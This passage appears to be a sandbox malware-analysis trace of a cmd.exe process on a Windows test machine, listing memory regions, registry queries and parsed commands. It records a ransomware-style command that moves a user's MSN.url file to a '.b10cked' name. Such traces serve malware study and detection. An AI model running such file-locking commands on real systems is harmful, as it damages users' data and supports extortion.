"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] 
Region: id = 31804 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31805 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31806 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31807 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 31808 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31809 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31810 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31811 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31812 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31813 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31928 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31929 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 31930 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 31931 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31932 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31933 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31934 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31935 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31936 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31937 start_va = 0x76d70000 
end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31938 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31939 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31940 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 31941 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31942 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31943 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31944 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31945 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31946 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31947 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 31948 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 31949 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 740 os_tid = 0xb34 [0215.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f934 | out: lpSystemTimeAsFileTime=0x26f934*(dwLowDateTime=0xb53fb180, dwHighDateTime=0x1d440a9)) [0215.495] GetCurrentProcessId () returned 0xba4 [0215.495] GetCurrentThreadId () returned 0xb34 [0215.495] GetTickCount () returned 0x3c512 [0215.495] QueryPerformanceCounter (in: lpPerformanceCount=0x26f92c | out: lpPerformanceCount=0x26f92c*=27228403069) returned 1 [0215.495] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.495] __set_app_type (_Type=0x1) [0215.495] __p__fmode () returned 0x76b331f4 [0215.495] __p__commode () returned 0x76b331fc [0215.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.496] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.496] GetCurrentThreadId () returned 0xb34 [0215.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb34) returned 0x38 [0215.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.496] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.496] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f8c4 | out: phkResult=0x26f8c4*=0x0) returned 0x2 [0215.496] VirtualQuery (in: lpAddress=0x26f8fb, lpBuffer=0x26f894, dwLength=0x1c | out: 
lpBuffer=0x26f894*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.496] GetConsoleOutputCP () returned 0x1b5 [0215.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.496] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.497] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.497] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.497] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0215.497] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.497] GetEnvironmentStringsW () returned 0x3c0178* [0215.498] FreeEnvironmentStringsW (penv=0x3c0178) returned 1 [0215.498] GetEnvironmentStringsW () returned 0x3c0178* [0215.498] FreeEnvironmentStringsW (penv=0x3c0178) returned 1 [0215.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e834 | out: phkResult=0x26e834*=0x40) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0xa0, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x0, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x4) returned 0x0 
[0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegCloseKey (hKey=0x40) returned 0x0 [0215.498] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e834 | out: phkResult=0x26e834*=0x40) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x0, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x9, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x9, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x9, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegCloseKey (hKey=0x40) returned 0x0 [0215.498] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.498] srand (_Seed=0x5b8863b1) [0215.498] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"" [0215.498] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"" [0215.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.499] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.499] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.499] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.499] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.499] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.499] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.499] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.499] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.499] _wcsicmp (_String1="PROMPT", 
_String2="TIME") returned -4 [0215.499] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.499] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.499] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.499] GetEnvironmentStringsW () returned 0x3c22c8* [0215.499] FreeEnvironmentStringsW (penv=0x3c22c8) returned 1 [0215.499] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.499] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.500] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.500] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.500] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.500] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.500] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.500] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.500] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.500] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f600 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f600, lpFilePart=0x26f5fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f5fc*="Desktop") returned 0x18 [0215.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.500] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f37c | out: lpFindFileData=0x26f37c) returned 0x3c0008 [0215.500] FindClose (in: hFindFile=0x3c0008 | out: hFindFile=0x3c0008) returned 1 [0215.500] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f37c | out: lpFindFileData=0x26f37c) returned 0x3c0008 [0215.500] FindClose (in: hFindFile=0x3c0008 | out: hFindFile=0x3c0008) returned 1 [0215.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f37c | out: lpFindFileData=0x26f37c) returned 0x3c0008 [0215.500] FindClose (in: hFindFile=0x3c0008 | out: hFindFile=0x3c0008) returned 1 [0215.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.501] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.501] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.501] GetEnvironmentStringsW () returned 0x3c2ae8* [0215.501] FreeEnvironmentStringsW (penv=0x3c2ae8) returned 1 [0215.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.501] GetConsoleOutputCP () returned 0x1b5 [0215.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.501] GetUserDefaultLCID () returned 0x409 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f740, cchData=128 | out: lpLCData="0") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f740, cchData=128 | out: lpLCData="0") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f740, cchData=128 | out: lpLCData="1") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.502] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.502] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.503] GetConsoleTitleW (in: lpConsoleTitle=0x3b08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.503] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.503] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.503] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.504] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.504] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.504] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.504] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.504] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.504] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.504] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0215.506] GetConsoleTitleW (in: lpConsoleTitle=0x26f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.506] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.506] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.506] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.506] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.507] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.507] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.507] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.507] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.507] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.507] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.507] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.507] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.507] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.507] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.507] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.507] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.507] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0215.507] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.507] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.507] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.507] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.507] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.509] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f1f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f1ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f1ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.509] _wcsnicmp (_String1="COPYCMD", 
